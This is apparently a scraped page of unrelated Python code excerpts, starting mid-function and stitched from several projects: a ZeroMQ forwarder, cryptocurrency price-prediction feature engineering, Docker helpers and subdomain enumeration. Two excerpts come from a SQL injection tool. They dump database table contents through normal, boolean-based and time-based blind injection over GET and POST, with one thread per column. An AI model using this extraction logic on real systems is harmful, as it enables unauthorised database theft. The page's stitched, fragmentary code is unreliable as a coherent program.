            open_ports = check_ports(results[ip_address]['Port/Protocol'])
            hostnames = list_to_str(results[ip_address]['Domains'])
            notes = results[ip_address]['Notes']
Example #27
    pub_s = context.socket(zmq.PUB)
    pub_s.bind('tcp://*:{PUB_PORT}'.format(PUB_PORT=pub_p))

    sub_s = context.socket(zmq.SUB)
    sub_s.setsockopt(zmq.SUBSCRIBE, '')
    sub_s.bind('tcp://*:{SUB_PORT}'.format(SUB_PORT=sub_p))

    poller.register(sub_s, zmq.POLLIN)

    while 1:
        socks = dict(poller.poll(360000))
        if socks:
            for sock, event in socks.iteritems():
                if sock is sub_s:
                    frame = sub_s.recv_multipart()
                    logger.info('MESSAGE:%s', frame)
                    pub_s.send_multipart(frame)


if __name__ == '__main__':
    sub_p = 9021
    pub_p = 9022
    opts, argvs = getopt.getopt(sys.argv[1:], "s:p:")
    for op, value in opts:
        if op == '-s':
            sub_p = int(value)
        if op == '-p':
            pub_p = int(value)
    logger.info('starting...')
    serv_forever(sub_p, pub_p)
Example #28
    def get_content(self, result, database_name, table_name, column_name,
                    limits):

        # Start injecting the content
        content_len = 0
        logger.debug("Start sqli table %s column %s limit %d content..." %
                     (table_name, column_name, limits))

        # GET first
        if self.sqlirequest == "GET":
            logger.debug("The sqlirequest is %s, start sqli content..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # Inject the length of this row's content
                logger.debug("Start %dth content length sqli..." %
                             (limits + 1))

                content_len = normal_injection(
                    select="length(" + column_name + ")",
                    source=database_name + "." + table_name,
                    limit=limits,
                    dealpayload=self.dealpayload,
                    data=self.Data,
                    isCount=True,
                    sqlirequest=self.sqlirequest)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # Then inject the content
                logger.debug("Start %dth content sqli..." % (limits + 1))

                content = normal_injection(select=column_name,
                                           source=database_name + "." +
                                           table_name,
                                           limit=limits,
                                           dealpayload=self.dealpayload,
                                           data=self.Data,
                                           isStrings=True,
                                           sqlirequest=self.sqlirequest)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # Return the content as a tuple
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # Then inject the length of the content

                retVal = build_injection(select="length(" + column_name + ")",
                                         source=database_name + "." +
                                         table_name,
                                         limit=limits,
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                content_len = int(retVal)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # Then inject the content
                # Reset content
                content = ""
                logger.debug("Start %dth content sqli..." % (limits + 1))

                for j in trange(int(content_len),
                                desc='%dth Content sqli' % (limits + 1),
                                leave=False):
                    retVal = build_injection(
                        select="ascii(substring(" + column_name + "," +
                        repr(j + 1) + ",1))",
                        source=database_name + "." + table_name,
                        limit=limits,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        lens=self.len,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)
                    content += chr(retVal)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # Return the content as a tuple
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # Then inject the length of the content

                retVal = time_injection(select="length(" + column_name + ")",
                                        source=database_name + "." +
                                        table_name,
                                        limit=limits,
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                content_len = int(retVal)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # Then inject the content
                # Reset content
                content = ""
                logger.debug("Start %dth content sqli..." % (limits + 1))

                for j in trange(int(content_len),
                                desc='%dth Content sqli' % (limits + 1),
                                leave=False):
                    retVal = time_injection(
                        select="ascii(substring(" + column_name + "," +
                        repr(j + 1) + ",1))",
                        source=database_name + "." + table_name,
                        limit=limits,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        times=self.time,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)
                    content += chr(retVal)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # Return the content as a tuple
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

        # Then POST
        elif self.sqlirequest == "POST":
            logger.debug("The sqlirequest is %s, start sqli contents..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # First inject the length of the content

                content_len = normal_injection(
                    select="length(" + column_name + ")",
                    source=database_name + "." + table_name,
                    limit=limits,
                    dealpayload=self.dealpayload,
                    data=self.Data,
                    isCount=True,
                    sqlirequest=self.sqlirequest)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # Then inject the content

                content = normal_injection(select=column_name,
                                           source=database_name + "." +
                                           table_name,
                                           limit=limits,
                                           dealpayload=self.dealpayload,
                                           data=self.Data,
                                           isStrings=True,
                                           sqlirequest=self.sqlirequest)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # Return the content as a tuple
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # Then inject the length of the content
                retVal = build_injection(select="length(" + column_name + ")",
                                         source=database_name + "." +
                                         table_name,
                                         limit=limits,
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                content_len = int(retVal)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # Then inject the content
                # Reset content
                content = ""
                logger.debug("Start %dth content sqli..." % (limits + 1))

                for j in trange(int(content_len),
                                desc='%dth Content sqli' % (limits + 1),
                                leave=False):
                    retVal = build_injection(
                        select="ascii(substring(" + column_name + "," +
                        repr(j + 1) + ",1))",
                        source=database_name + "." + table_name,
                        limit=limits,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        lens=self.len,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)
                    content += chr(retVal)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # Return the content as a tuple
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # Then inject the length of the content
                retVal = time_injection(select="length(" + column_name + ")",
                                        source=database_name + "." +
                                        table_name,
                                        limit=limits,
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                content_len = int(retVal)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # Then inject the content
                # Reset content
                content = ""
                logger.debug("Start %dth content sqli..." % (limits + 1))

                for j in trange(int(content_len),
                                desc='%dth Content sqli' % (limits + 1),
                                leave=False):
                    retVal = time_injection(
                        select="ascii(substring(" + column_name + "," +
                        repr(j + 1) + ",1))",
                        source=database_name + "." + table_name,
                        limit=limits,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        times=self.time,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)
                    content += chr(retVal)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # Return the content as a tuple
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

        logger.debug("Sqli table %s column %s limit %d success..." %
                     (table_name, column_name, limits))
Example #29
    def run_content(self):

        if len(self.columns_name) == 0:
            SqliColumns.get_columns(self)

        # Unpack in a loop and start the injection
        for database_name in self.columns_name:
            for table_name in self.columns_name[database_name]:

                # Get the number of rows; if it differs from self.content_count, update self.content_count to match
                content_counts = self.get_content_count(
                    database_name, table_name)
                if content_counts == 0:
                    logger.warning('Database %s Table %s is empty...' %
                                   (database_name, table_name))
                    continue
                elif content_counts != self.content_count:
                    logger.debug(
                        'Database %s Table %s content amount change to %d' %
                        (database_name, table_name, content_counts))
                    self.content_count = content_counts
                else:
                    pass

                # Create a table to hold the data
                content = PrettyTable(
                    list(self.columns_name[database_name][table_name]))
                content.padding_width = 1
                content.align = "r"

                # Each table is injected once per row, self.content_count times
                for limits in xrange(self.content_count):

                    # Create a queue to hold the returned values
                    result = Queue.Queue()

                    # Thread list, result list, and the final row data added to the table
                    threads = []
                    results = []
                    contents = []

                    # Start the multithreaded injection
                    logger.debug("Start multithreading Sqli...")
                    for column_name in self.columns_name[database_name][
                            table_name]:
                        # One thread extracts one column
                        try:
                            t = threading.Thread(
                                target=self.get_content,
                                name='thread for %s' % column_name,
                                args=(result, database_name, table_name,
                                      column_name, limits))
                            t.start()
                            # Only join threads that actually started
                            threads.append(t)
                        except ConnectionError:
                            logger.error('Thread error...')

                    # Wait for all threads to finish
                    for t in threads:
                        t.join()

                    # Drain the queue of values returned for this row
                    while not result.empty():
                        results.append(result.get())

                    # Reorder the results to match the column order
                    for i in list(
                            self.columns_name[database_name][table_name]):
                        for item in results:
                            if item[0] == i:
                                contents.append(item[1])
                            else:
                                continue

                    # Insert the row
                    content_str = ','.join(contents)
                    logger.info("Sqli success content is %s" % content_str)
                    content.add_row(contents)

                # Print the table
                logger.debug("Database %s Table %s sqli success..." %
                             (database_name, table_name))
                print "[*] Database %s Table %s content:" % (database_name,
                                                             table_name)
                print content
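The fan-out/join/collect pattern above (one thread per column, results keyed through a Queue, then reordered to match the column order) can be written more compactly with concurrent.futures; a sketch, assuming a hypothetical get_content_value method that returns the extracted value instead of writing to a queue:

from concurrent.futures import ThreadPoolExecutor

def fetch_row(self, database_name, table_name, columns, limits):
    # One worker per column; futures are keyed by column name, so results
    # come back already matched to their column and need no reordering pass.
    # get_content_value is hypothetical: a get_content variant returning its value.
    with ThreadPoolExecutor(max_workers=len(columns)) as pool:
        futures = {col: pool.submit(self.get_content_value, database_name,
                                    table_name, col, limits)
                   for col in columns}
        return [futures[col].result() for col in columns]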
Exemple #30
0
def main():
    index = load_dataset('all_merged', return_index=True)
    for _sym, data in index.items():
        features, target = get_symbol_features(index, _sym)

        features_p = features[data['features']['ohlcv']].pct_change().replace(
            [np.inf, -np.inf], np.nan)
        features_p.columns = [c + '_p1' for c in features_p.columns]
        features_1 = features_p.shift(1)
        features_1.columns = [c + '_lag1' for c in features_1.columns]
        features_2 = features_p.shift(2)
        features_2.columns = [c + '_lag2' for c in features_2.columns]

        features_mean = features_p.rolling(3).mean()
        features_mean.columns = [c + '_mean_3' for c in features_mean.columns]

        ta = features[data['features']['ta'] + data['features']['ta_7d'] +
                      data['features']['ta_30d']]

        features = pd.concat([
            features['close'], ta, features_p, features_1, features_2,
            features_mean
        ],
                             axis=1)[30:]
        target = target[30:]
        # Split data into train and blind test sets with a 70:30 ratio;
        #  most ML models don't take sequentiality into account, but our pipeline
        #  uses a SimpleImputer with mean strategy, so it's best not to shuffle the data.
        X_train, X_test, y_train, y_test = train_test_split(features.values,
                                                            target.values,
                                                            shuffle=False,
                                                            test_size=0.3)
        logger.info("Start Feature Selection")
        imp = SimpleImputer()
        values = imp.fit_transform(X_train)
        #sel = SelectKBest(score_func=f_classif, k=min(10, X_train.shape[1]))
        feature_count = int(0.3 * X_train.shape[1])
        sel = RFECV(estimator=RandomForestClassifier(),
                    cv=5,
                    verbose=0,
                    n_jobs=4,
                    min_features_to_select=feature_count,
                    scoring='neg_mean_squared_error')
        sel.fit(values, y_train)
        logger.info("End Feature Selection")
        bestfeatures = [
            c for c, f in zip(features.columns, sel.get_support()) if f
        ]
        if 'close' not in bestfeatures:
            bestfeatures += ['close']
        print("Using {} features:\n{}".format(len(bestfeatures), bestfeatures))

        train_features = pd.DataFrame(X_train, columns=features.columns)
        test_features = pd.DataFrame(X_test, columns=features.columns)
        X_train = train_features[bestfeatures].values
        X_test = test_features[bestfeatures].values

        # Summarize distribution
        print("Training set: # Features {}, # Samples {}".format(
            X_train.shape[1], X_train.shape[0]))
        plot_class_distribution("Training set", _sym, y_train)
        print("Test set: # Features {}, # Samples {}".format(
            X_test.shape[1], X_test.shape[0]))
        plot_class_distribution("Test set", _sym, y_test)
        if not np.isfinite(X_train).all():
            logger.warning("Training x is not finite!")
        if not np.isfinite(y_train).all():
            logger.warning("Training y is not finite!")
        if not np.isfinite(X_test).all():
            logger.warning("Test x is not finite!")
        if not np.isfinite(y_test).all():
            logger.warning("Test y is not finite!")

        # Build pipeline to be used as estimator in grid search
        #  so that each subset of the data is transformed independently
        #  to avoid contamination between folds.
        pipeline = Pipeline([
            (
                'i', IterativeImputer()
            ),  # Impute nan's by modelling each feature as a function of the others
            ('s', MinMaxScaler(feature_range=(-1, 1))),
            ('c', MLPClassifier()),
        ])

        # Perform hyperparameter tuning of the pipeline with 5-fold cross validation
        logger.info("Start Grid search")
        CV_rfc = GridSearchCV(estimator=pipeline,
                              param_grid=PARAM_GRID,
                              cv=5,
                              n_jobs=4,
                              scoring='neg_mean_squared_error',
                              verbose=1)
        CV_rfc.fit(X_train, y_train)
        logger.info("End Grid search")

        # Take the fitted pipeline with tuned hyperparameters
        clf = CV_rfc.best_estimator_
        # Test the tuned model's performance on training and test sets
        logger.info("Classification report on train set")
        predictions1 = clf.predict(X_train)
        train_report = classification_report(y_train,
                                             predictions1,
                                             output_dict=True)
        print(classification_report(y_train, predictions1))
        logger.info("Classification report on test set")
        predictions2 = clf.predict(X_test)
        test_report = classification_report(y_test,
                                            predictions2,
                                            output_dict=True)
        print(classification_report(y_test, predictions2))
        stats = {
            'score': accuracy_score(y_train, predictions1),
            'mse': mean_squared_error(y_train, predictions1),
            'test_score': accuracy_score(y_test, predictions2),
            'test_mse': mean_squared_error(y_test, predictions2),
            'train_report': train_report,
            'test_report': test_report,
        }
        print(CV_rfc.best_params_)
        num_samples = min(y_train.shape[0], y_test.shape[0], 30)
        print("Gains calculated on {} samples only!".format(num_samples))
        print(
            "Train Accuracy: {}\nTrain MSE: {}\nGains on train preds: 100 -> {}"
            .format(
                accuracy_score(y_train, predictions1),
                mean_squared_error(y_train, predictions1),
                test_gains(train_features['close'][0:num_samples],
                           predictions1[0:num_samples],
                           initial_balance=100,
                           position_size=0.1)))
        print(
            "Test Accuracy: {}\nTest MSE: {}\nGains on test preds: 100 -> {}".
            format(
                accuracy_score(y_test, predictions2),
                mean_squared_error(y_test, predictions2),
                test_gains(test_features['close'][0:num_samples],
                           predictions2[0:num_samples],
                           initial_balance=100,
                           position_size=0.1)))
        print("--- end ---")
Exemple #31
0
def build(source_index, dest_index, W=10):
    _dataset = load_dataset(source_index, return_index=True)

    for _sym, entry in _dataset.items():
        _df = pd.read_csv(entry['csv'],
                          sep=',',
                          encoding='utf-8',
                          index_col='Date',
                          parse_dates=True)
        _target = pd.read_csv(entry['target_csv'],
                              sep=',',
                              encoding='utf-8',
                              index_col='Date',
                              parse_dates=True)
        ohlcv = _df[entry['features']['ohlcv']]

        ohlcv_d = {
            d: _df[entry['features']['ohlcv_{}d'.format(d)]]
            for d in [3, 7, 30]
        }
        ta_d = {
            d: _df[entry['features']['ta_{}d'.format(d)]]
            for d in [3, 7, 30]
        }

        ta = _df[entry['features']['ta']]
        cm = _df[entry['features']['cm']]

        cm_picked = pd.DataFrame(index=ohlcv.index)
        if 'adractcnt' in cm.columns:
            cm_picked['adractcnt_pct'] = cm.adractcnt.pct_change()
            # cm_picked['adractcnt_mean3_pct'] = cm.adractcnt.rolling(3).mean().pct_change()
            # cm_picked['adractcnt_mean7_pct'] = cm.adractcnt.rolling(7).mean().pct_change()
        # if 'splycur' in cm.columns: ## Correlated with volume and close
        #     cm_picked['vol_supply'] = ohlcv.volume / cm.splycur # Ratio between transacted volume and total supply (mined)
        if 'txtfrvaladjntv' in cm.columns and 'isstotntv' in cm.columns and 'feetotntv' in cm.columns:
            # I want to represent miners' earnings (fees + issued coins) vs the amount transacted in that interval
            cm_picked['earned_vs_transacted'] = (
                cm.isstotntv + cm.feetotntv) / cm.txtfrvaladjntv
        if 'isstotntv' in cm.columns:
            # isstotntv is total number of coins mined in the time interval
            # splycur is total number of coins mined (all time)
            total_mined = cm.isstotntv.rolling(
                365, min_periods=7).sum()  # total mined in a year
            cm_picked['isstot365_isstot1_pct'] = (cm.isstotntv /
                                                  total_mined).pct_change()
        if 'splycur' in cm.columns and 'isstotntv' in cm.columns:
            cm_picked['splycur_isstot1_pct'] = (cm.isstotntv /
                                                cm.splycur).pct_change()
        if 'hashrate' in cm.columns:
            #cm_picked['hashrate_mean3_pct'] = cm.hashrate.rolling(3).mean().pct_change()
            #cm_picked['hashrate_mean7_pct'] = cm.hashrate.rolling(7).mean().pct_change()
            cm_picked['hashrate_pct'] = cm.hashrate.pct_change()
        if 'roi30d' in cm.columns:
            cm_picked['roi30d'] = cm.roi30d
        if 'isstotntv' in cm.columns:
            cm_picked['isstotntv_pct'] = cm.isstotntv.pct_change()
        if 'feetotntv' in cm.columns:
            cm_picked['feetotntv_pct'] = cm.feetotntv.pct_change()
        if 'txtfrcount' in cm.columns:
            cm_picked['txtfrcount_pct'] = cm.txtfrcount.pct_change()
            #cm_picked['txtfrcount_volume'] = cm.txtfrcount.pct_change()
        if 'vtydayret30d' in cm.columns:
            cm_picked['vtydayret30d'] = cm.vtydayret30d
        if 'isscontpctann' in cm.columns:
            cm_picked['isscontpctann'] = cm.isscontpctann

        ta_picked = pd.DataFrame(index=ta.index)
        # REMA / RSMA are already used and well-established in ATSA.
        # I'm taking the pct change since I want to encode the relative movement of the EMAs, not their positions
        # ta_picked['rema_5_20_pct'] = ta.rema_5_20.pct_change()
        ta_picked['rema_8_15_pct'] = ta.rema_8_15.pct_change()
        # ta_picked['rema_20_50_pct'] = ta.rema_20_50.pct_change()
        # ta_picked['rsma_5_20_pct'] = ta.rsma_5_20.pct_change()
        ta_picked['rsma_8_15_pct'] = ta.rsma_8_15.pct_change()
        # ta_picked['rsma_20_50_pct'] = ta.rema_20_50.pct_change()

        # Stoch is a momentum indicator comparing a particular closing price of a security to a range of its prices
        # over a certain period of time.
        # The sensitivity of the oscillator to market movements is reducible by adjusting that time period or
        # by taking a moving average of the result.
        # It is used to generate overbought and oversold trading signals, utilizing a 0-100 bounded range of values.
        # IDEA => decrease sensitivity with a 3-period mean, and divide by 100 to get floating-point values
        ta_picked['stoch_14_mean3_div100'] = ta.stoch_14.rolling(
            3).mean() / 100

        # Moving Average Convergence Divergence (MACD) is a trend-following momentum indicator that shows
        # the relationship between two moving averages of a security’s price.
        # The MACD is calculated by subtracting the 26-period Exponential Moving Average (EMA) from the 12-period EMA.
        #  A nine-day EMA of the MACD, called the "signal line", is then plotted on top of the MACD line,
        #  which can function as a trigger for buy and sell signals.
        #  Traders may buy the security when the MACD crosses above its signal line and sell - or short - the security
        #  when the MACD crosses below the signal line.
        #  Moving Average Convergence Divergence (MACD) indicators can be interpreted in several ways,
        #  but the more common methods are crossovers, divergences, and rapid rises/falls.
        signal_line = builder.exponential_moving_average(ta.macd_12_26, 9)
        ta_picked['macd_12_26_signal'] = signal_line  # The signal line itself
        # Relationship with the signal line
        ta_picked['macd_12_26_diff_signal'] = (ta.macd_12_26 - signal_line).pct_change()
        # Information about slope
        ta_picked['macd_12_26_pct'] = ta.macd_12_26.pct_change()

        # PPO is identical to the moving average convergence divergence (MACD) indicator,
        # except the PPO measures percentage difference between two EMAs, while the MACD measures absolute (dollar) difference.
        signal_line = builder.exponential_moving_average(ta.ppo_12_26, 9)
        ta_picked['ppo_12_26_signal'] = signal_line  # The signal line itself
        # Relationship with the signal line
        ta_picked['ppo_12_26_diff_signal'] = (ta.ppo_12_26 - signal_line).pct_change()
        # Information about slope
        ta_picked['ppo_12_26_pct'] = ta.ppo_12_26.pct_change()

        # ADI Accumulation/distribution is a cumulative indicator that uses volume and price to assess whether
        # a stock is being accumulated or distributed.
        # The accumulation/distribution measure seeks to identify divergences between the stock price and volume flow.
        # This provides insight into how strong a trend is. If the price is rising but the indicator is falling
        # this indicates that buying or accumulation volume may not be enough to support
        # the price rise and a price decline could be forthcoming.
        # ==> IDEA: if we can fit a line to the price y1 = m1X+q1 and a line to ADI y2=m2X+q2 then we can identify
        #           divergences by simply looking at the sign of M.
        #           Another insight would be given by the slope (ie pct_change)
        ta_picked['adi_pct'] = ta.adi.pct_change()
        ta_picked['adi_close_convergence'] = convergence_between_series(
            ta.adi, ohlcv.close, 3)

        # RSI goes from 0 to 100, values <= 20 mean BUY, while values >= 80 mean SELL.
        # Dividing it by 100 to get a floating point feature, makes no sense to pct_change it
        ta_picked['rsi_14_div100'] = ta.rsi_14 / 100

        # The Money Flow Index (MFI) is a technical indicator that generates overbought or oversold
        #   signals using both prices and volume data. The oscillator moves between 0 and 100.
        # An MFI reading above 80 is considered overbought and an MFI reading below 20 is considered oversold,
        #   although levels of 90 and 10 are also used as thresholds.
        # A divergence between the indicator and price is noteworthy. For example, if the indicator is rising while
        #   the price is falling or flat, the price could start rising.
        ta_picked['mfi_14_div100'] = ta.mfi_14 / 100

        # The Chande momentum oscillator is a technical momentum indicator similar to other momentum indicators
        #   such as Wilder’s Relative Strength Index (Wilder’s RSI) and the Stochastic Oscillator.
        #   It measures momentum on both up and down days and does not smooth results, triggering more frequent
        #   oversold and overbought penetrations. The indicator oscillates between +100 and -100.
        # Many technical traders add a 10-period moving average to this oscillator to act as a signal line.
        #   The oscillator generates a bullish signal when it crosses above the moving average and a
        #   bearish signal when it drops below the moving average.
        ta_picked['cmo_14_div100'] = ta.cmo_14 / 100
        signal_line = builder.simple_moving_average(ta.cmo_14, 10)
        ta_picked['cmo_14_signal'] = signal_line
        ta_picked['cmo_14_diff_signal'] = (ta.cmo_14 - signal_line) / 100

        # On-balance volume (OBV) is a technical trading momentum indicator that uses volume flow to predict changes in stock price.
        # Eventually, volume drives the price upward. At that point, larger investors begin to sell, and smaller investors begin buying.
        # Despite being plotted on a price chart and measured numerically,
        # the actual individual quantitative value of OBV is not relevant.
        # The indicator itself is cumulative, while the time interval remains fixed by a dedicated starting point,
        # meaning the real number value of OBV arbitrarily depends on the start date.
        # Instead, traders and analysts look to the nature of OBV movements over time;
        # the slope of the OBV line carries all of the weight of analysis. => We want percent change
        ta_picked['obv_pct'] = ta.obv.pct_change()
        ta_picked['obv_mean3_pct'] = ta.obv.rolling(3).mean().pct_change()

        # Strong rallies in price should see the force index rise.
        # During pullbacks and sideways movements, the force index will often fall because the volume
        # and/or the size of the price moves gets smaller.
        # => Encoding the percent variation could be a good idea
        ta_picked['fi_13_pct'] = ta.fi_13.pct_change()
        ta_picked['fi_50_pct'] = ta.fi_50.pct_change()

        # The Aroon Oscillator is a trend-following indicator that uses aspects of the
        # Aroon Indicator (Aroon Up and Aroon Down) to gauge the strength of a current trend
        # and the likelihood that it will continue.
        # It moves between -100 and 100. A high oscillator value is an indication of an uptrend
        # while a low oscillator value is an indication of a downtrend.
        ta_picked['ao_14'] = ta.ao_14 / 100

        # The average true range (ATR) is a technical analysis indicator that measures market volatility
        #   by decomposing the entire range of an asset price for that period.
        # ATRP is pct_change of volatility
        ta_picked['atrp_14'] = ta.atrp_14

        # Percentage Volume Oscillator (PVO) is momentum volume oscillator used in technical analysis
        #   to evaluate and measure volume surges and to compare trading volume to the average longer-term volume.
        # PVO does not analyze price and it is based solely on volume.
        #  It compares fast and slow volume moving averages by showing how short-term volume differs from
        #  the average volume over longer-term.
        #  Since it does not take the price trend into account in its calculation (only volume data are used),
        #  this technical indicator cannot be used alone to predict changes in a trend.
        ta_picked['pvo_12_26'] = ta.pvo_12_26

        # IGNORED: tsi, wd, adx,

        #lagged_stats = pd.concat([ohlcv_stats] + [builder.make_lagged(ohlcv_stats, i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner')

        # Build the dataframe with base features
        # lagged_close = pd.concat([ohlcv.close.pct_change()] + [builder.make_lagged(ohlcv.close.pct_change(), i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner')
        # lagged_close.columns = ['close_pct'] + ['close_pct_lag-{}'.format(i) for i in range(1, W +1)]

        ohlc = ohlcv[['open', 'high', 'low', 'close', 'volume']].pct_change()
        ohlc.columns = ['{}_pct'.format(c) for c in ohlc.columns]
        lagged_ohlc_pct = pd.concat(
            [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)],
            axis='columns',
            verify_integrity=True,
            sort=True,
            join='inner')

        _time = pd.DataFrame(index=ohlcv.index)
        _time['day_of_year'] = ohlcv.index.dayofyear
        _time['day_of_week'] = ohlcv.index.dayofweek

        ohlc = ohlcv[['open', 'high', 'low', 'close', 'volume']]
        x_space = np.linspace(0, ohlc.index.size, ohlc.index.size)
        _splines = pd.DataFrame(index=ohlcv.index)

        # Highly correlated between themselves, no use
        # _splines['open_spl'] = get_spline(ohlc.open, 0)
        # _splines['high_spl'] = get_spline(ohlc.high, 0)
        # _splines['low_spl'] = get_spline(ohlc.low, 0)
        # _splines['close_spl'] = get_spline(ohlc.close, 0)

        _splines['open_spl_d1'] = builder.get_spline(ohlc.open, 1)
        _splines['high_spl_d1'] = builder.get_spline(ohlc.high, 1)
        _splines['low_spl_d1'] = builder.get_spline(ohlc.low, 1)
        _splines['close_spl_d1'] = builder.get_spline(ohlc.close, 1)

        _splines['open_spl_d2'] = builder.get_spline(ohlc.open, 2)
        _splines['high_spl_d2'] = builder.get_spline(ohlc.high, 2)
        _splines['low_spl_d2'] = builder.get_spline(ohlc.low, 2)
        _splines['close_spl_d2'] = builder.get_spline(ohlc.close, 2)

        _patterns = builder.get_talib_patterns(ohlcv)
        _new_features = pd.DataFrame(index=ohlcv.index)
        _new_features['candlestick_patterns_mean'] = _patterns.mean(axis=1)
        _new_features['candlestick_patterns_sum'] = _patterns.sum(axis=1)
        # WE LIKE THESE TWO!!!!
        _new_features['close_volatility_7d'] = ohlcv.close.pct_change().rolling(7).std(ddof=0)
        _new_features['close_volatility_30d'] = ohlcv.close.pct_change().rolling(30).std(ddof=0)
        #
        # Candle body size variation, for example
        # Change in the body of the candle (> 0 if the candle is green)
        _new_features['close_open_pct'] = (ohlcv.close - ohlcv.open).pct_change()
        # Change in the upper wick size; a shorter wick should be bullish
        _new_features['high_close_dist_pct'] = (ohlcv.high - ohlcv.close).pct_change()
        # Change in the lower shadow size; an increase would indicate support (maybe a bounce)
        _new_features['low_close_dist_pct'] = (ohlcv.close - ohlcv.low).pct_change()
        # Change in the total candle size; smaller candles stand for low volatility
        _new_features['high_low_dist_pct'] = (ohlcv.high - ohlcv.low).pct_change()

        for d in [3, 7, 30]:
            ohlcv_d[d].columns = ['close', 'high', 'low', 'open', 'volume']
            _new_features['close_open_pct_d{}'.format(d)] = (
                ohlcv_d[d].close - ohlcv_d[d].open).pct_change()
            _new_features['high_close_dist_pct_d{}'.format(d)] = (
                ohlcv_d[d].high - ohlcv_d[d].close).pct_change()
            _new_features['low_close_dist_pct_d{}'.format(d)] = (
                ohlcv_d[d].close - ohlcv_d[d].low).pct_change()
            _new_features['high_low_dist_pct_d{}'.format(d)] = (
                ohlcv_d[d].high - ohlcv_d[d].low).pct_change()

        _ta_windowed_features = pd.concat(
            [v.rename(columns={c: '{}_ta{}d'.format(c, d) for c in v.columns})
             for d, v in ta_d.items()],
            axis=1)
        # Rename the daily TA features with a '_ta1d' suffix, then assemble all feature groups
        ta.columns = ['{}_ta1d'.format(c) for c in ta.columns]
        feature_groups = [
            _new_features, _splines, lagged_ohlc_pct, cm_picked, ta_picked,
            _ta_windowed_features, ta
        ]

        improved_df = pd.concat(feature_groups,
                                axis='columns',
                                verify_integrity=True,
                                sort=True,
                                join='inner')

        # Drop the first 30 rows
        improved_df = improved_df[30:]
        # Drop columns whose values are all nan or inf
        with pd.option_context('mode.use_inf_as_na',
                               True):  # Set option temporarily
            improved_df = improved_df.dropna(axis='columns', how='all')
        logger.info('Saving {}'.format(_sym))
        save_symbol_dataset(dest_index, _sym, improved_df, target=_target)
        logger.info('Saved {}'.format(_sym))
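convergence_between_series, used above for the ADI/close divergence idea, is not included in this excerpt; a minimal sketch that follows the in-code comment (fit a line to each series over a trailing window and compare slope signs) could look like this (hypothetical reconstruction):

import numpy as np

# Hypothetical sketch of convergence_between_series; the real helper is
# defined elsewhere in this project. s1 and s2 are pandas Series.
def convergence_between_series(s1, s2, window):
    def slope(values):
        x = np.arange(len(values))
        m, _ = np.polyfit(x, values, 1)   # slope of the fitted line y = m*x + q
        return m
    m1 = s1.rolling(window).apply(slope, raw=True)
    m2 = s2.rolling(window).apply(slope, raw=True)
    # +1 when both series trend the same way, -1 on divergence, 0 when flat.
    return np.sign(m1 * m2)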
Exemple #32
0
def stop_container(self, name=None, id=None):
    for c in self.containers.values():
        if (not name and not id) or id == c['Id'] or (name and name in c['Names']):
            self.client.kill(c['Id'])
            self.client.remove_container(c['Id'], force=True)
            L.info("Stopped container %(Name)s (%(Status)s)" % c)
Exemple #33
0
def run(self):
    domain_list = self.enumerate()
    for domain in domain_list:
        self.domain_name.append(domain)
    logger.info("{0} found {1} domains".format(self.engine_name, len(self.domain_name)))
    return self.domain_name, self.smiliar_domain_name, self.related_domain_name, self.email
Exemple #34
0
